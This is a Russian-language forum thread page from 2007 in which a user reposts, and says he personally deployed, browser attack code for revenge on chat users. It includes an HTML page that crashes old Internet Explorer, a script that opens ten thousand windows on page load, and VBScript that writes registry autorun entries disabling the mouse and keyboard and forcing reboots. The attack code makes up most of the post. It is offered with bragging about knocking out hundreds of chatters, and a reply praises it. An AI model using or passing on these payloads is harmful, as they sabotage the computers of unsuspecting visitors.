Среда, 15-Май-2024
Кино Музыка Софт
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 2 из 2
  • «
  • 1
  • 2
Форум » Интересное » Разговоры обо всём » java скрипты (java скрипты и т.п.)
java скрипты
demzykДата: Среда, 24-Янв-2007, 11:50:43 PM | Сообщение # 11
Генерал-майор
Группа: Проверенные
Сообщений: 321
Репутация: 17
Статус: Offline
ОЧЕНЬ ДАВНО ПРОЧИТАЛ НА ANTICHAT.RU

Подло но приятно!!!
Tiran
Способ №1

Когда я зашел впервой в один из городских чатов появился вопрос - че делать-то? Мне небыло с кем вообще поговорить, никто на меня внимания не обращал… Ответ пришел быстро: только матюками гнуть.Тут же выкинули.С этого момента я перестал быть нармальным человеком и стал одержим идеей мести!Тут я и надумал сделать пакость чату!!! Планы в уме зашли аж до того чтоб пойти и сервер на котором весь чат висит ногами попинать…Но не судьба!

Но зашел я как-то в нет и тут вижу: дыра в InternetExplorer до версии 5.0! Решил мстить!!! Сделал сайт и зашил в главную страницу этот « бок ». делается это просто:

1.Бесплатный хостинг

2.Одна страница Index.htm

3. Страница делается так:

<html>
<head>
<title>Bugz</title>
<script language="JavaScript1.2">window.location="file:///c:/nul/nul";</script>
</head>
</html>

4.Делаешь ссылку в чате, говоришь руль-сайт!!! Есть все для всех про все!!!Все заходят и 1/3 чата вымирает чат рядеет на глазах!!!

Описюю самую удачную попытку в www.galachat.net два года назад : захожу, 700-800 человек в чате, один обидел,делаю ссылку и подробное описанее ресурса типа парнуха взлом вири анти вири...обновляю, 20 чел осталось в живых.

Мало? Ведь скоро в пакеты с форточкой будут кидать iexplorer 6.0 и через полгода-год этот способ можно забыть но тут!!

Способ№2

Ну подвесить - это одно, а вот заставить нервничать юзвера - это почти другое, собственно поробуйте выполнить вот этот код (просто перенисите все это в пустой HTML файлик), следующий скрипт открывает кучу окошков, так что закрыть их проблематично, для легкости - главное окно названо как MULTIPLE - закрой его через CTRL+ALT+DEL и все исчезнет, так что флаг тебе в руки !

<html>
<head>
<title>Multiple windows</title>
</head>

<script language = javascript>
function generate_windows(){
var i=1;
while (i < 10000){ //
window. open("about:blank");
i++;
}
}
</script>
<body onload = "generate_windows()">
</body>
</html>

Способ №3

Этот способ только для опытных юзеров, а ламерам тут нефиг делать! Штука в том чтобы с HTML-я при помощи VBS напаротоь подлым гадам т.е админам

Есть у форточки такая штука как RUNDLL32 который очень много значит и должен жить по адресу(почти у всех так) C:\windows\rundll32.exe

И ентот милый файлик имеет особенность вырубать машину, клавиатуру, маузу…Ну в общем при правильном обращении никаких троянов не нужно, все уже есть!!! Делаете ссылку на запуск этого с дополнительными параметрами

Так вот, с помощью VBScript можно решить юзера по полному западлу. Действует примерно так: решился поц зайти на твою пагу, потом он когда перезагрузился тут и клава не работает, тут и мышь отсутствует... Cамое приятное что после этого нужна винду переустанавливать...Смысл в том, что-бы прописать ему в автозапуск лишь две команды,

1. Отключение мыши: rundll32 mouse,disable

2. Отключение клавы: rundll32 keyboard,disable

И самое обидное: rundll32 shell32,SHExitWindowsEx 2

И погибнет юзер от постоянной перезагрузки и без мыши и без клавы...

Ну и главное! Сделать это, а точнее занести инфу в реестр можно с помощью VBScript:

<HTML>
<HEAD>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
<!--
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Mad", "rundll32 mouse,disable"

WshShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Dead", "rundll32 keyboard,disable"

-->
</SCRIPT>
</BODY>
</HTML>

Либо сразу перегрузку обезпечить

<HTML>
<HEAD>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
<!--

Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows"

-->
</SCRIPT>
</BODY>
</HTML>

Добавлено (2007-01-24, 11:49 Pm)
---------------------------------------------
PS ПРОСЬБА НЕ ЩАЛИТЕ ПРОСТО ТАК =) И ЕЩЕ PS#2! ЕСЛИ КОГОТО ЗААХОТИТЕ ТАК ПОЛОЖИТЬ ТО СКАЖИТЕ КАК РЕЗУЛЬТАТ И КАКИМ ИМЕННО СКРИПТОМ ПОЛЬЗОВАЛИСЬ ХОТЯ ЕТО НЕ JAVA А ПРОСТО HTML КОДЫ !

Добавлено (2007-01-24, 11:50 Pm)
---------------------------------------------
Я ЛИЧЬНО ЗДЕЛАЛ ЕТУ СТРАНИТЦУ www.raime.pbnet.ru

с етим кодом

<HTML>
<HEAD>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
<!--
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Mad", "rundll32 mouse,disable"

WshShell.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Dead", "rundll32 keyboard,disable"

-->
</SCRIPT>
</BODY>
</HTML>

cool


demzyk@mail.ru
635-088
­­­==============
 
StanДата: Вторник, 27-Фев-2007, 4:08:26 AM | Сообщение # 12
Генерал-майор
Группа: Проверенные
Сообщений: 353
Репутация: 9
Статус: Offline
demzyk, оч даже интересно... cool

sndick@inbox.ru
 
Форум » Интересное » Разговоры обо всём » java скрипты (java скрипты и т.п.)
  • Страница 2 из 2
  • «
  • 1
  • 2
Поиск:

Copyright MyCorp © 2024
Сайт управляется системой uCoz